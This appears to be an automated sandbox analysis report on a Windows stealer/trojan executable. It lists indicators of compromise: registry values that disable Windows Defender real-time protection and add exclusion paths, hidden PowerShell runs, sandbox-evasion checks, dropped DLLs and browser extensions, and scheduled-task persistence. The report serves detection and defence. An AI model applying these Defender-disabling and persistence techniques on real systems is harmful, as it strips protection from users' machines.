95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8

Analysis

max time kernel
210s
max time network
212s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 05:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe
Size

7.3MB
MD5

ac81ad24fbf667ea5a758b9a528d185f
SHA1

7c2855420ae6d7f98190d1448058d83c398047f7
SHA256

95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8
SHA512

af3120c92e58fbc1cf4ba72e7728a45738b5745277e09c845620840823d19e60633b7efea359d6fd79a321e96f5b20b310cf82ccfa1aafbd5c69e285c6c4d1a9
SSDEEP

196608:91O2GEMz42h9O0RZoRXD9f7/eeoSuTdtvX:3OPEJ2h9O0R0hDVovjX

Score

10^/10

discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZDLVjxnHU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\rPjTFWmQUriHtIVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TuhNvssQnTUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZDLVjxnHU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wWtwQxeSPhIsC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ijGSqddcuZeU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ijGSqddcuZeU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nIXneLoYhSqxVZkgocR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nIXneLoYhSqxVZkgocR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wWtwQxeSPhIsC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\rPjTFWmQUriHtIVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TuhNvssQnTUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

27 1512 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.exe

pid process

2764 powershell.exe
2980 powershell.EXE
2416 powershell.EXE
1256 powershell.exe
1704 powershell.EXE
2220 powershell.exe
2276 powershell.exe

flow	pid	process
27	1512	rundll32.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

EygrVAx.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\International\Geo\Nation EygrVAx.exe
Executes dropped EXE 4 IoCs

Processes:

Install.exeInstall.exezbqjHGl.exeEygrVAx.exe

pid process

2992 Install.exe
3000 Install.exe
2236 zbqjHGl.exe
2620 EygrVAx.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\International\Geo\Nation	EygrVAx.exe

pid	process
2992	Install.exe
3000	Install.exe
2236	zbqjHGl.exe
2620	EygrVAx.exe

Loads dropped DLL 23 IoCs

Processes:

95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exeInstall.exeInstall.exeWerFault.exerundll32.exeWerFault.exeWerFault.exe

pid	process
2916	95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe
2992	Install.exe
2992	Install.exe
2992	Install.exe
2992	Install.exe
3000	Install.exe
3000	Install.exe
3000	Install.exe
2420	WerFault.exe
2420	WerFault.exe
2420	WerFault.exe
1512	rundll32.exe
1512	rundll32.exe
1512	rundll32.exe
1512	rundll32.exe
2244	WerFault.exe
2244	WerFault.exe
2244	WerFault.exe
2244	WerFault.exe
2244	WerFault.exe
2828	WerFault.exe
2828	WerFault.exe
2828	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

EygrVAx.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	EygrVAx.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	EygrVAx.exe

Drops file in System32 directory 24 IoCs

Processes:

powershell.EXEpowershell.EXEEygrVAx.exepowershell.exezbqjHGl.exepowershell.EXErundll32.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	EygrVAx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	EygrVAx.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	EygrVAx.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	zbqjHGl.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	zbqjHGl.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	EygrVAx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	EygrVAx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	EygrVAx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	EygrVAx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	EygrVAx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	EygrVAx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	EygrVAx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	EygrVAx.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	zbqjHGl.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	zbqjHGl.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	EygrVAx.exe

Drops file in Program Files directory 13 IoCs

Processes:

EygrVAx.exe

description	ioc	process
File created	C:\Program Files (x86)\ZDLVjxnHU\unhwMf.dll	EygrVAx.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	EygrVAx.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	EygrVAx.exe
File created	C:\Program Files (x86)\ZDLVjxnHU\CnKBwPL.xml	EygrVAx.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	EygrVAx.exe
File created	C:\Program Files (x86)\ijGSqddcuZeU2\TJuqCIU.xml	EygrVAx.exe
File created	C:\Program Files (x86)\nIXneLoYhSqxVZkgocR\nOBVhjg.xml	EygrVAx.exe
File created	C:\Program Files (x86)\wWtwQxeSPhIsC\JsUypkw.xml	EygrVAx.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	EygrVAx.exe
File created	C:\Program Files (x86)\nIXneLoYhSqxVZkgocR\IZcYcRc.dll	EygrVAx.exe
File created	C:\Program Files (x86)\ijGSqddcuZeU2\IupnThMwLMnfc.dll	EygrVAx.exe
File created	C:\Program Files (x86)\wWtwQxeSPhIsC\zzmXism.dll	EygrVAx.exe
File created	C:\Program Files (x86)\TuhNvssQnTUn\pEVYasH.dll	EygrVAx.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\brlogsXZdQLKJRjYtj.job	schtasks.exe
File created	C:\Windows\Tasks\bdmBPZkQYKMDiCzlG.job	schtasks.exe
File created	C:\Windows\Tasks\tRbTscEIBTcXFpe.job	schtasks.exe
File created	C:\Windows\Tasks\SQVSLJdEAqcPOSFTe.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

2420 2236 WerFault.exe zbqjHGl.exe
2244 3000 WerFault.exe Install.exe
2828 2620 WerFault.exe EygrVAx.exe

pid	pid_target	process	target process
2420	2236	WerFault.exe	zbqjHGl.exe
2244	3000	WerFault.exe	Install.exe
2828	2620	WerFault.exe	EygrVAx.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

wscript.exeEygrVAx.exepowershell.exerundll32.exezbqjHGl.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	EygrVAx.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	EygrVAx.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0026000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	EygrVAx.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F38CB632-1FA1-4A4D-ABFF-D12F6707007A}\8e-27-2d-32-ba-d3	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	EygrVAx.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	zbqjHGl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-27-2d-32-ba-d3\WpadDecisionReason = "1"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-27-2d-32-ba-d3\WpadDecisionTime = 40c535a874cbda01	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	EygrVAx.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	EygrVAx.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	EygrVAx.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000002038e49774cbda01	zbqjHGl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	EygrVAx.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F38CB632-1FA1-4A4D-ABFF-D12F6707007A}	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	EygrVAx.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	EygrVAx.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F38CB632-1FA1-4A4D-ABFF-D12F6707007A}\WpadNetworkName = "Network 3"	EygrVAx.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80a4f99774cbda01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	EygrVAx.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-27-2d-32-ba-d3\WpadDetectedUrl	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	zbqjHGl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F38CB632-1FA1-4A4D-ABFF-D12F6707007A}\WpadDecision = "0"	EygrVAx.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-27-2d-32-ba-d3\WpadDecision = "0"	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	EygrVAx.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	zbqjHGl.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
372	schtasks.exe
2324	schtasks.exe
2688	schtasks.exe
2648	schtasks.exe
3024	schtasks.exe
936	schtasks.exe
2412	schtasks.exe
1376	schtasks.exe
2956	schtasks.exe
376	schtasks.exe
2940	schtasks.exe
2808	schtasks.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exepowershell.EXEEygrVAx.exepowershell.exepowershell.exe

pid	process
2764	powershell.exe
2980	powershell.EXE
2980	powershell.EXE
2980	powershell.EXE
2416	powershell.EXE
2416	powershell.EXE
2416	powershell.EXE
1256	powershell.exe
1704	powershell.EXE
1704	powershell.EXE
1704	powershell.EXE
2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2220	powershell.exe
